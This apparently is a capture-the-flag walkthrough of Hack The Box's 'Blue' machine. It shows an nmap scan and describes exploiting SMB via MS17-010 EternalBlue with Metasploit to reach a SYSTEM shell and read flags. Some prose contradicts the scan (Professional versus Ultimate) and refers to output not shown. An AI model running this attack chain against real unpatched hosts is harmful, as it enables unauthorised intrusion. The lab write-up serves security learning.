Blue, while possibly the most simple machine on Hack The Box, demonstrates the severity of the EternalBlue exploit, which has been used in multiple large-scale ransomware and crypto-mining attacks sin
┌──(kali㉿kali)-[~]
└─$ nmap -p- -A -T4 192.168.154.129
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-11 03:39 EDT
Nmap scan report for 192.168.154.129
Host is up (0.00012s latency).
Not shown: 65528 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Windows 7 Ultimate 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
Service Info: Host: WIN-845Q99OO4PP; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-os-discovery:
| OS: Windows 7 Ultimate 7601 Service Pack 1 (Windows 7 Ultimate 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1
| Computer name: WIN-845Q99OO4PP
| NetBIOS computer name: WIN-845Q99OO4PP\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2024-03-11T03:42:02-04:00
| smb2-time:
| date: 2024-03-11T07:42:02
|_ start_date: 2024-03-11T17:58:29
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 1h19m59s, deviation: 2h18m33s, median: 0s
|_nbstat: NetBIOS name: WIN-845Q99OO4PP, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:ea:70:5f (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 147.80 seconds
The SMB output says this is Windows 7 Professional.
There are a couple shares with null session read access (the trick of giving smbmap wrong creds works here):
nmap has vuln scripts that will check for known vulnerabilities in service. It finds a big one, MS-17-010.
Searching on Exploit DB lead to the following script.
We can use Metasploit to execute this.
3 is a scanner, we can run that to confirm the vulnerability. 4 needs a backdoor that is already on the system so we can't use it. Let's start with the scan first and then use 0.
We can run it after entering RHOST.
We can see the it is indeed vulnerable. We can exploit it.
Initial Access
Coming back to 0 i.e exploit/windows/smb/ms17_010_eternalblue. We shall use it now after setting up the options and payload.
We now have meterpreter shell.
As you can see we are already NT AUTHORITY\SYSTEM which is root access.
Now we can just get the flags need.
C:\Windows\system32>cd \users
C:\Users>dir
Volume in drive C has no label.
Volume Serial Number is A0EF-1911
Directory of C:\Users
21/07/2017 07:56 <DIR> .
21/07/2017 07:56 <DIR> ..
21/07/2017 07:56 <DIR> Administrator
14/07/2017 14:45 <DIR> haris
12/04/2011 08:51 <DIR> Public
0 File(s) 0 bytes
5 Dir(s) 17,256,050,688 bytes free
C:\Users>type administrator\desktop\root.txt
[REDACTED]
C:\Users>type haris\desktop\user.txt
[REDACTED]
